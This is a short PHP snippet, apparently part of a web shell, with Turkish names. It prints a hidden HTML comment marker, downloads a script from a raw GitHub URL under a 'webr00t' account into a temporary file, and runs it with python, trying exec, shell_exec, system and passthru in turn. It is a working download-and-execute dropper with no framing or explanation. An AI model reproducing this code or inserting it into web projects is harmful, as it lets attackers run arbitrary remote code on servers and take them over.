echo "<!--rahatinizabakin-->";
$temp = tmpfile();
$dosya = @file_get_contents("https://raw.githubusercontent.com/webr00t/web/master/www.txt");
fwrite($temp, $dosya);
$bilgi = stream_get_meta_data($temp);
$dizin = $bilgi['uri'];
$komut = "python {$dizin}";
if(function_exists('exec')){$sonuc = @exec($komut);}elseif(function_exists('shell_exec')){$sonuc = @shell_exec($komut);}elseif(function_exists('system')){$sonuc = @system($komut);}elseif(function_exists('passthru')){$sonuc = @passthru($komut);
}else{
echo "tum fonksiyonlar kapali aq";
}
print $sonuc;
fclose($temp);
